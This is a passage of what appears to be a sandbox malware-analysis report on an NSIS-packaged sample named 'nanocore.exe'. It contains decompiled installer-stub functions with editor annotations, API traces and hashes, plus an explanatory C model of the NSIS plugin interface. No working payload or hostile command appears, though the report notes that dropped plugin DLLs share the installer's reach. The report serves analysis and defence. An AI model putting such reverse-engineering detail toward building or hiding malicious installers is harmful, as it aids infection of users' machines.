            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
            • String ID:
            • API String ID: 1609199483-0
            • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
            • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
            Uniqueness

            Uniqueness Score: -1.00%

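            The five-argument call near the end of E00401FDC is the NSIS plugin calling convention. The C program below is an added example written by the editor; it is not code from the sandbox report, from the analysed sample or from the NSIS project. It models the host side of that call (the variable block, the string stack and the call itself) together with a hypothetical plugin export named PathLen that uses them. The stack_t layout and the variable slot numbering follow NSIS's ExDLL plugin header; HWND and extra_parameters are reduced stand-ins so the program builds and runs outside Windows, and the $INSTDIR value is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef void *HWND;                  /* stand-in for the Win32 window handle */
#define NSIS_MAX_STRLEN 1024         /* the 0x400 the stub passes as string_size */

/* NSIS hands plugins its string stack as a singly linked list; each node's
   text[] is string_size bytes long (layout from NSIS's ExDLL plugin header) */
typedef struct _stack_t { struct _stack_t *next; char text[1]; } stack_t;

/* Assumption: a reduced extra_parameters; the real struct carries the exec
   flags and several callbacks, none of which this example uses. */
typedef struct { int *exec_flags; int (*ExecuteCodeSegment)(int, HWND); } extra_parameters;

/* The variable block is string_size bytes per slot: $0..$9 = 0..9, $R0..$R9 = 10..19,
   $CMDLINE 20, $INSTDIR 21, $OUTDIR 22, $EXEDIR 23, $LANGUAGE 24 */
enum { INST_0 = 0, INST_R0 = 10, INST_CMDLINE = 20, INST_INSTDIR = 21, INST_LAST = 25 };

/* Prototype of every NSIS plugin export, i.e. the five-argument call in E00401FDC */
typedef void (*nsis_plugin_fn)(HWND, int, char *, stack_t **, extra_parameters *);

static void push_string(stack_t **top, int string_size, const char *s) {
    stack_t *e = malloc(sizeof(stack_t) + (size_t)string_size);
    snprintf(e->text, (size_t)string_size, "%s", s);
    e->next = *top;
    *top = e;
}

static int pop_string(stack_t **top, int string_size, char *out) {
    stack_t *e = *top;
    if (!e) return 1;                /* NSIS convention: non-zero = stack was empty */
    *top = e->next;
    snprintf(out, (size_t)string_size, "%s", e->text);
    free(e);
    return 0;
}

/* Hypothetical plugin export "PathLen": pops one string, stores its length in $0
   and pushes "ok". A DLL export with exactly this signature is what GetProcAddress
   returned in the decompiled function. */
void PathLen(HWND hwndParent, int string_size, char *variables, stack_t **stacktop, extra_parameters *extra) {
    char arg[NSIS_MAX_STRLEN];
    (void)hwndParent; (void)extra;
    if (pop_string(stacktop, string_size, arg)) {
        push_string(stacktop, string_size, "error: empty stack");
        return;
    }
    snprintf(variables + INST_0 * string_size, (size_t)string_size, "%zu", strlen(arg));
    push_string(stacktop, string_size, "ok");
}

/* Host side: set up variables and stack the way the stub does, make the call, then pop
   the plugin's result like a script's `Pop $1`. Returns the number the plugin left in $0,
   or -1 if it reported an error. argument == NULL pushes nothing (empty-stack case). */
int run_plugin_call(nsis_plugin_fn fn, const char *argument) {
    char *variables = calloc(INST_LAST, NSIS_MAX_STRLEN);
    stack_t *stacktop = NULL;
    int exec_flags = 0;
    extra_parameters extra = { &exec_flags, NULL };
    char ret[NSIS_MAX_STRLEN];
    int result = -1;

    if (!variables) return -1;
    snprintf(variables + INST_INSTDIR * NSIS_MAX_STRLEN, NSIS_MAX_STRLEN, "C:\\Program Files\\Example"); /* constructed */
    if (argument) push_string(&stacktop, NSIS_MAX_STRLEN, argument);   /* script: Push "<argument>" */

    fn(NULL, NSIS_MAX_STRLEN, variables, &stacktop, &extra);         /* func(hwnd, 0x400, variables, &stacktop, &extra) */

    if (pop_string(&stacktop, NSIS_MAX_STRLEN, ret) == 0 && strcmp(ret, "ok") == 0)
        result = atoi(variables + INST_0 * NSIS_MAX_STRLEN);
    while (pop_string(&stacktop, NSIS_MAX_STRLEN, ret) == 0) {}      /* drain anything left behind */
    free(variables);
    return result;
}

int main(void) {
    printf("PathLen(\"C:\\\\Temp\\\\x.dll\") -> $0 = %d\n", run_plugin_call(PathLen, "C:\\Temp\\x.dll"));
    printf("PathLen with an empty stack -> %d\n", run_plugin_call(PathLen, NULL));
    return 0;
}
```

            The point of the five arguments is visible here: the plugin does not receive a copy of anything, it gets the live variable block and the live stack, which is why a malicious plugin DLL dropped by an installer has the same reach as the installer script itself.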
            C-Code - Quality: 100%
            			// Editor's note: matches NSIS exehead util.c file_exists(): returns a pointer to a static WIN32_FIND_DATA (here 0x7a15d0) when the path exists, otherwise NULL.
            			E00405C94(CHAR* _a4) {
            				void* _t3;
            				void* _t8;
            
            				SetErrorMode(0x8001); // executed; SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX: no "There is no disk in the drive" box on an empty removable drive
            				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
            				_t8 = _t3; // executed
            				SetErrorMode(0); // executed
            				if(_t8 == 0xffffffff) { // INVALID_HANDLE_VALUE: nothing matched
            					return 0;
            				}
            				FindClose(_t8); // executed
            				return 0x7a15d0;
            			}
            Instruction addresses for the C code above, one per statement line in order (0x00000000 marks a goto/label line synthesised by the decompiler):
            0x00405ca2 0x00405cae 0x00405cb6 0x00405cb8 0x00405cbd 0x00000000 0x00405cca 0x00405cc0
            0x00000000

            APIs
            • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ), ref: 00405CA2
            • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
            • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
            • FindClose.KERNELBASE(00000000), ref: 00405CC0
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ErrorFindMode$CloseFileFirst
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2885216544-3081826266
            • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
            • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			// Editor's note: matches NSIS exehead ui.c ui_doinstall(): UI language detection, install directory from the registry, background ("_Nb") and RichEdit window classes, then the main dialog.
            			E00403526() {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				int _v12;
            				int _v16;
            				char _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr* _t20;
            				void* _t28;
            				void* _t30;
            				int _t31;
            				void* _t34;
            				struct HINSTANCE__* _t37;
            				int _t38;
            				int _t42;
            				char _t61;
            				CHAR* _t63;
            				signed char _t67;
            				CHAR* _t78;
            				intOrPtr _t80;
            				CHAR* _t82;
            				CHAR* _t84;
            				CHAR* _t85;
            
            				_t80 =  *0x7a2f88;
            				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage"); // myGetProcAddress(): GetModuleHandle/LoadLibrary + GetProcAddress (subcall 00405CD2 below); the export is missing on Windows 9x/NT4
            				_t88 = _t20;
            				if(_t20 == 0) {
            					_t78 = 0x79f580;
            					"1033" = 0x7830; // decompiler artefact: the language buffer is shown by its dumped contents ("1033"); the store writes the 2-byte prefix "0x" (0x30 '0', 0x78 'x') into it before the registry locale value is appended below
            					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580); // HKEY_CURRENT_USER, Windows 9x location
            					__eflags =  *0x79f580;
            					if(__eflags == 0) {
            						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580); // H

KEY_USERS, Windows NT location
            					}
            					lstrcatA("1033", _t78);
            				} else {
            					E0040591D("1033",  *_t20() & 0x0000ffff); // myitoa(state_language, GetUserDefaultUILanguage()) via wsprintfA (subcall 0040591D below)
            				}
            				E004037F2(_t75, _t88);
            				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
            				 *0x7a3000 =  *0x7a2f90 & 0x00000020; // g_exec_flags.autoclose = header->flags & CH_FLAGS_AUTO_CLOSE
            				if(E004055AC(_t88, _t84) != 0) {
            					L16:
            					if(E004055AC(_t96, _t84) == 0) {
            						_push( *((intOrPtr*)(_t80 + 0x118)));
            						_push(_t84);
            						E004059E1(0, _t78, _t80);
            					}
            					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
            					 *0x7a2768 = _t28;
            					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
            						L21:
            						if(E00401410(0) == 0) {
            							_t30 = E004037F2(_t75, __eflags);
            							__eflags =  *0x7a3020;
            							if( *0x7a3020 != 0) {
            								_t31 = E00404E34(_t30, 0);
            								__eflags = _t31;
            								if(_t31 == 0) {
            									E00401410(1);
            									goto L33;
            								}
            								__eflags =  *0x7a274c;
            								if( *0x7a274c == 0) {
            									E00401410(2);
            								}
            								goto L22;
            							}
            							ShowWindow( *0x79f560, 5);
            							_t85 = "RichEd20.dll";
            							_t37 = LoadLibraryA(_t85);
            							__eflags = _t37;
            							if(_t37 == 0) {
            								M004092B6 = 0x3233; // patch the literal in place to "RichEd32.dll" (0x3233 = "32" at offset 6) and retry
            								LoadLibraryA(_t85);
            							}
            							_t82 = "RichEdit20A";
            							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
            							__eflags = _t38;
            							if(_t38 == 0) {
            								 *0x4092ac = 0; // truncate "RichEdit20A" to "RichEdit" (NUL at index 8) and look that class up instead
            								GetClassInfoA(0, _t82, 0x7a2720);
            								 *0x7a2744 = _t82;
            								 *0x4092ac = 0x32; // restore the '2' so the copied class is registered under the RichEdit20A name
            								RegisterClassA(0x7a2720);
            							}
            							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
            							E00401410(5);
            							return _t42;
            						}
            						L22:
            						_t34 = 2;
            						return _t34;
            					} else {
            						_t75 =  *0x7a2f80;
            						 *0x7a2734 = _t28;
            						_v20 = 0x624e5f; // "_Nb": class name of the installer's background window
            						 *0x7a2724 = E00401000;
            						 *0x7a2730 =  *0x7a2f80;
            						 *0x7a2744 =  &_v20;
            						if(RegisterClassA(0x7a2720) == 0) {
            							L33:
            							__eflags = 0;
            							return 0;
            						}
            						_t12 =  &_v16; // 0x624e5f
            						SystemParametersInfoA(0x30, 0, _t12, 0);
            						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
            						goto L21;
            					}
            				} else {
            					_t75 =  *(_t80 + 0x48);
            					if(_t75 == 0) {
            						goto L16;
            					}
            					_t78 = 0x7a1f20;
            					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
            					_t61 =  *0x7a1f20; // 0x49
            					if(_t61 == 0) {
            						goto L16;
            					}
            					if(_t61 == 0x22) { // registry value is quoted: step past the opening '"' and cut at the closing one
            						_t78 = 0x7a1f21;
            						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
            					}
            					_t63 = lstrlenA(_t78) + _t78 - 4;
            					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) { // does the value end in ".exe"?
            						L15:
            						E004059BF(_t84, E004054CC(_t78));
            						goto L16;
            					} else {
            						_t67 = GetFileAttributesA(_t78);
            						if(_t67 == 0xffffffff) {
            							L14:
            							E00405513(_t78);
            							goto L15;
            						}
            						_t96 = _t67 & 0x00000010;
            						if((_t67 & 0x00000010) != 0) { // FILE_ATTRIBUTE_DIRECTORY: keep the path; a file path loses its last component at L14
            							goto L15;
            						}
            						goto L14;
            					}
            				}
            			}
            Instruction addresses for the C code above, one per statement line in order (0x00000000 marks a goto/label line synthesised by the decompiler):
            0x0040352c 0x0040353d 0x00403544 0x00403546 0x0040355a 0x0040355f 0x00403575 0x0040357a
            0x00403580 0x00403592 0x00403592 0x0040359d 0x00403548 0x00403553 0x00403553 0x004035a2
            0x004035ac 0x004035b5 0x004035c1 0x00403647 0x0040364f 0x00403651 0x00403657 0x00403658
            0x00403658 0x0040366e 0x00403674 0x00403682 0x00403711 0x00403719 0x00403723 0x00403728
            0x0040372e 0x004037c0 0x004037c5 0x004037c7 0x004037e3 0x00000000 0x004037e3 0x004037c9
            0x004037cf 0x004037d7 0x004037d7 0x00000000 0x004037cf 0x0040373c 0x00403748 0x0040374e
            0x00403750 0x00403752 0x00403755 0x0040375e 0x0040375e 0x00403766 0x0040376e 0x00403770
            0x00403772 0x00403777 0x0040377d 0x00403780 0x00403786 0x0040378d 0x0040378d 0x004037ac
            0x004037b6 0x00000000 0x004037bb 0x0040371b 0x0040371d 0x00000000 0x00403688 0x00403688
            0x0040368e 0x00403698 0x004036a0 0x004036aa 0x004036b0 0x004036be 0x004037e8 0x004037e8
            0x00000000 0x004037e8 0x004036c4 0x004036cd 0x0040370c 0x00000000 0x0040370c 0x004035c7
            0x004035c7 0x004035cc 0x00000000 0x00000000 0x004035d6 0x004035e5 0x004035ea 0x004035f1
            0x00000000 0x00000000 0x004035f5 0x004035f7 0x00403604 0x00403604 0x0040360c 0x00403612
            0x0040363a 0x00403642 0x00000000 0x00403624 0x00403625 0x0040362e 0x00403634 0x00403635
            0x00000000 0x00403635 0x00403630 0x00403632 0x00000000 0x00000000 0x00000000 0x00403632
            0x00403612

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\nanocore.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
            • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00403607
            • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
            • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
            • LoadImageA.USER32 ref: 0040366E
            • RegisterClassA.USER32 ref: 004036B5
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
            • CreateWindowExA.USER32 ref: 00403706
            • ShowWindow.USER32(00000005,00000000), ref: 0040373C
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
            • GetClassInfoA.USER32 ref: 0040376E
            • GetClassInfoA.USER32 ref: 0040377D
            • RegisterClassA.USER32 ref: 0040378D
            • DialogBoxParamA.USER32 ref: 004037AC
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
            • String ID: 'z$"C:\Users\user\Desktop\nanocore.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
            • API String ID: 914957316-891290843
            • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
            • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			// Editor's note: matches NSIS exehead main.c loadHeaders(cl_flags): find the firstheader appended to the stub, verify the CRC32 unless /NCRC, then load the compressed header.
            			E00402C37(void* __eflags, signed int _a4) {
            				struct HWND__* _v8;
            				long _v12;
            				long _v16;
            				void* _v20;
            				intOrPtr _v24;
            				long _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				signed int _v48;
            				long _t52;
            				signed int _t56;
            				void* _t62;
            				intOrPtr* _t66;
            				long _t67;
            				signed int _t73;
            				signed int _t78;
            				signed int _t79;
            				long _t84;
            				intOrPtr _t89;
            				void* _t91;
            				signed int _t92;
            				signed int _t93;
            				signed int _t94;
            				signed int _t95;
            				void* _t97;
            				signed int _t101;
            				void* _t102;
            
            				_v8 = 0;
            				_t52 = GetTickCount();
            				_v16 = 0;
            				_v12 = 0;
            				_t100 = "C:\\Users\\jones\\Desktop";
            				_t97 = _t52 + 0x3e8;
            				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400); // path of the running installer into state_exe_path (the decompiler shows the buffer by its dumped contents); NSIS_MAX_STRLEN = 0x400
            				_t91 = E00405690(_t100, 0x80000000, 3);
            				_v20 = _t91;
            				 *0x409020 = _t91;
            				if(_t91 == 0xffffffff) {
            					return "Error launching installer"; // could not open its own image for reading
            				}
            				E00405513(_t100);
            				_t56 = GetFileSize(_t91, 0);
            				__eflags = _t56;
            				 *0x79d938 = _t56;
            				_t101 = _t56;
            				if(_t56 <= 0) {
            					L27:
            					__eflags =  *0x7a2f8c;
            					if( *0x7a2f8c == 0) {
            						goto L33;
            					}
            					__eflags = _v12;
            					if(_v12 == 0) {
            						L31:
            						_t102 = GlobalAlloc(0x40, _v28); // GPTR buffer of length_of_header bytes for the decompressed header
            						E004030FF( *0x7a2f8c + 0x1c);
            						_push(_v28);
            						_push(_t102);
            						_push(0);
            						_push(0xffffffff);
            						_t62 = E00402EBD(); // decompress the header block into it; a short result means a corrupt installer
            						__eflags = _t62 - _v28;
            						if(_t62 == _v28) {
            							__eflags = _a4 & 0x00000002;
            							 *0x7a2f88 = _t102;
            							if((_a4 & 0x00000002) != 0) { // FH_FLAGS_SILENT (/S on the command line): header->flags |= CH_FLAGS_SILENT
            								 *_t102 =  *_t102 | 0x00000008;
            								__eflags =  *_t102;
            							}
            							__eflags = _v48 & 0x00000001;
            							 *0x7a3020 =  *_t102 & 0x00000018; // g_exec_flags.silent = header->flags & (CH_FLAGS_SILENT | CH_FLAGS_SILENT_LOG)
            							 *0x7a2f90 =  *_t102;
            							if((_v48 & 0x00000001) != 0) { // FH_FLAGS_UNINSTALL: g_is_uninstaller++
            								 *0x7a2f94 =  *0x7a2f94 + 1;
            								__eflags =  *0x7a2f94;
            							}
            							_t49 = _t102 + 0x44; // 0x44
            							_t66 = _t49;
            							_t93 = 8;
            							do { // turn the 8 block offsets (pages, sections, entries, strings, langtables, ctlcolors, bgfont, data) from header-relative into absolute pointers
            								_t66 = _t66 - 8;
            								 *_t66 =  *_t66 + _t102;
            								_t93 = _t93 - 1;
            								__eflags = _t93;
            							} while (_t93 != 0);
            							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed; FILE_CURRENT: remember where the compressed data starts (blocks[NB_DATA].offset)
            							 *(_t102 + 0x3c) = _t67;
            							E00405670(0x7a2fa0, _t102 + 4, 0x40);
            							__eflags = 0;
            							return 0;
            						}
            						GlobalFree(_t102);
            						goto L33;
            					}
            					E004030FF( *0x789930); // SetSelfFilePointer(m_pos): seek to the stored CRC, 4 bytes before the end of the data
            					_t73 = E004030CD( &_v12, 4); // executed; read the stored CRC
            					__eflags = _t73;
            					if(_t73 == 0) {
            						goto L33;
            					}
            					__eflags = _v16 - _v12;
            					if(_v16 != _v12) { // computed CRC != stored CRC: corrupt
            						goto L33;
            					}
            					goto L31;
            				} else {
            					do {
            						_t92 = _t101;
            						asm("sbb eax, eax");
            						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200; // read size: 0x200 until the header has been found (g_filehdrsize == 0), 0x8000 afterwards
            						__eflags = _t101 - _t78;
            						if(_t101 >= _t78) {
            							_t92 = _t78;
            						}
            						_t79 = E004030CD(0x795938, _t92); // executed; ReadSelfFile(temp, l)
            						__eflags = _t79;
            						if(_t79 == 0) {
            							__eflags = _v8;
            							if(_v8 != 0) {
            								DestroyWindow(_v8);
            							}
            							L33:
            							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
            						}
            						__eflags =  *0x7a2f8c;
            						if( *0x7a2f8c != 0) {
            							__eflags = _a4 & 0x00000002;
            							if((_a4 & 0x00000002) == 0) { // not silent: show the "verifying installer" dialog once a second (0x3e8 ms) has passed
            								__eflags = _v8;
            								if(_v8 == 0) {
            									_t84 = GetTickCount();
            									__eflags = _t84 - _t97;
            									if(_t84 > _t97) {
            										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
            									}
            								} else {
            									E00405CFC(0);
            								}
            							}
            							goto L22;
            						}
            						E00405670( &_v48, 0x795938, 0x1c); // copy the 28-byte firstheader: flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
            						_t94 = _v48;
            						__eflags = _t94 & 0xfffffff0;
            						if((_t94 & 0xfffffff0) != 0) { // flags must lie within FH_FLAGS_MASK (0xf)
            							goto L22;
            						}
            						__eflags = _v44 - 0xdeadbeef;
            						if(_v44 != 0xdeadbeef) { // siginfo == FH_SIG
            							goto L22;
            						}
            						__eflags = _v32 - 0x74736e49;
            						if(_v32 != 0x74736e49) { // nsinst[2] == "Inst"
            							goto L22;
            						}
            						__eflags = _v36 - 0x74666f73;
            						if(_v36 != 0x74666f73) { // nsinst[1] == "soft"
            							goto L22;
            						}
            						__eflags = _v40 - 0x6c6c754e;
            						if(_v40 != 0x6c6c754e) { // nsinst[0] == "Null"
            							goto L22;
            						}
            						_t89 = _v24;
            						__eflags = _t89 - _t101;
            						if(_t89 > _t101) { // length_of_all_following_data exceeds what is left of the file: corrupt
            							goto L33;
            						}
            						_a4 = _a4 | _t94; // cl_flags |= h.flags
            						_t95 =  *0x789930; // 0x4e6c2
            						__eflags = _a4 & 0x00000008;
            						 *0x7a2f8c = _t95; // g_filehdrsize = m_pos, the file offset of the firstheader
            						if((_a4 & 0x00000008) != 0) { // FH_FLAGS_FORCE_CRC: verify even if /NCRC was given
            							L15:
            							_v12 = _v12 + 1; // do_crc++
            							_t24 = _t89 - 4; // 0x1c; left = length_of_all_following_data - 4: the trailing 4 bytes hold the stored CRC and are not hashed
            							_t101 = _t24;
            							__eflags = _t92 - _t101;
            							if(_t92 > _t101) {
            								_t92 = _t101;
            							}
            							goto L22;
            						}
            						__eflags = _a4 & 0x00000004;
            						if((_a4 & 0x00000004) != 0) { // FH_FLAGS_NO_CRC (/NCRC): stop scanning and skip verification
            							break;
            						}
            						goto L15;
            						L22:
            						__eflags = _t101 -  *0x79d938; // 0x4e6c6
            						if(__eflags < 0) { // left < m_length: every block except the very first 512 bytes of the stub goes into the CRC
            							_v16 = E00405D2F(_v16, 0x795938, _t92); // crc = CRC32(crc, temp, l)
            						}
            						 *0x789930 =  *0x789930 + _t92;
            						_t101 = _t101 - _t92;
            						__eflags = _t101;
            					} while (_t101 > 0);
            					__eflags = _v8;
            					if(_v8 != 0) {
            						DestroyWindow(_v8);
            					}
            					goto L27;
            				}
            			}
            Instruction addresses for the C code above, one per statement line in order (0x00000000 marks a goto/label line synthesised by the decompiler):
            0x00402c42 0x00402c45 0x00402c4b 0x00402c4e 0x00402c51 0x00402c64 0x00402c6a 0x00402c7d
            0x00402c82 0x00402c85 0x00402c8b 0x00000000 0x00402c8d 0x00402c98 0x00402ca0 0x00402ca6
            0x00402ca8 0x00402cad 0x00402caf 0x00402dde 0x00402de0 0x00402de6 0x00000000 0x00000000
            0x00402de8 0x00402deb 0x00402e0f 0x00402e1a 0x00402e25 0x00402e2a 0x00402e2d 0x00402e2e
            0x00402e2f 0x00402e31 0x00402e36 0x00402e39 0x00402e5a 0x00402e5e 0x00402e64 0x00402e66
            0x00402e66 0x00402e66 0x00402e6e 0x00402e72 0x00402e79 0x00402e7e 0x00402e80 0x00402e80
            0x00402e80 0x00402e88 0x00402e88 0x00402e8b 0x00402e8c 0x00402e8c 0x00402e8f 0x00402e91
            0x00402e91 0x00402e91 0x00402e9b 0x00402ea1 0x00402eaf 0x00402eb4 0x00000000 0x00402eb4
            0x00402e3c 0x00000000 0x00402e3c 0x00402df3 0x00402dfe 0x00402e03 0x00402e05 0x00000000
            0x00000000 0x00402e0a 0x00402e0d 0x00000000 0x00000000 0x00000000 0x00402cb5 0x00402cb5
            0x00402cba 0x00402cbe 0x00402cc5 0x00402cca 0x00402ccc 0x00402cce 0x00402cce 0x00402cd6
            0x00402cdb 0x00402cdd 0x00402e49 0x00402e4d 0x00402e52 0x00402e52 0x00402e42 0x00000000
            0x00402e42 0x00402ce5 0x00402ceb 0x00402d6c 0x00402d70 0x00402d72 0x00402d75 0x00402d7f
            0x00402d85 0x00402d87 0x00402da3 0x00402da3 0x00402d77 0x00402d78 0x00402d78 0x00402d75
            0x00000000 0x00402d70 0x00402cf8 0x00402cfd 0x00402d00 0x00402d06 0x00000000 0x00000000
            0x00402d0c 0x00402d13 0x00000000 0x00000000 0x00402d19 0x00402d20 0x00000000 0x00000000
            0x00402d26 0x00402d2d 0x00000000 0x00000000 0x00402d2f 0x00402d36 0x00000000 0x00000000
            0x00402d38 0x00402d3b 0x00402d3d 0x00000000 0x00000000 0x00402d43 0x00402d46 0x00402d4c
            0x00402d50 0x00402d56 0x00402d5e 0x00402d5e 0x00402d61 0x00402d61 0x00402d64 0x00402d66
            0x00402d68 0x00402d68 0x00000000 0x00402d66 0x00402d58 0x00402d5c 0x00000000 0x00000000
            0x00000000 0x00402da6 0x00402da6 0x00402dac 0x00402dbc 0x00402dbc 0x00402dbf 0x00402dc5
            0x00402dc7 0x00402dc7 0x00402dcf 0x00402dd3 0x00402dd8 0x00402dd8 0x00000000 0x00402dd3

            APIs
            • GetTickCount.KERNEL32 ref: 00402C45
